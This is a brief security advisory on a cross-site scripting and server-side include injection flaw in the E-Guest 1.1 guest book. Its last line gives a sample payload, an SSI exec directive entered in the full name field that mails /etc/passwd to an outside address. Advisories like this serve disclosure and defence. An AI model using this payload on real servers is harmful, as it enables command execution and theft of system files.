[原文]Cross-site scripting (XSS) vulnerability in E-Guest_sign.pl in E-Guest 1.1 allows remote attackers to inject arbitrary SSI directives, web script, and HTML via the (1) full name, (2) email, (3) homepage, and (4) location parameters. NOTE: this issue might overlap CVE-2005-1605.
E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems.
E-Guest does not adequately sanitize user-supplied input in guest book entries. Because of this, it is possible to pass along commands via server-side includes that could allow a remote user to execute commands on the local host.
Full Name: HI<!--#exec cmd="/bin/mail email@example.com < /etc/passwd"-->